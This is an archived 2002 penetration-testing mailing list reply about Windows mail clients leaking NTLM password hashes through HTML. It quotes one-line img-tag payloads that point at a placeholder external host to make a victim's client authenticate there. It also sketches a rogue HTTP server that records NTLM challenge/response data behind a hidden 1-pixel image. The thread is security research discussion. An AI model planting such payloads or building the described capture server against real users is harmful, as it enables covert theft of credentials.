Penetration Testing mailing list archives
Re: Hijacking the hashes : multiple windows mail clients vulnerability
From: olle <olle () nxs se>
Date: Thu, 4 Jul 2002 14:45:13 +0200
On Wed, Jul 03, 2002 at 04:43:46PM -0000, overclocking_a_la_abuela () hotmail com wrote:
<snip>
So, what about if there was another method to force a user on a windows box to send you his hashes, without his knowledge, without using any interactive method, non javascript, non activeX, non some lame social engeneering technique... only HTML ?
<snip>
1st) <img src="file://\\\\external_IP\\resource"> or 2nd) <img src="\\\\external_IP\\resource">.
As you say in your post, any good firewall/border router would stop this. You could try a normal http:// url to your apache server with a hacked up NTLM-authentication module that records the challenge/resonse fields in the SSP exchange... This would most likely bypass any firewall/proxy... Never actually done this, but it might be fun to hack up som code similar to slingerbult[1] that just solicits an SSP challenge/response and returns a 1-pixel transparent gif or something... ;) It would be fun if someone tried this out, I don't think I will have the urge to do it any time soon, but it's been on my mind for quite some time. /olle ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Hijacking the hashes : multiple windows mail clients vulnerability overclocking_a_la_abuela (Jul 03)
- Re: Hijacking the hashes : multiple windows mail clients vulnerability olle (Jul 04)
- Re: Hijacking the hashes : multiple windows mail clients vulnerability Fabio Pietrosanti (naif) (Jul 05)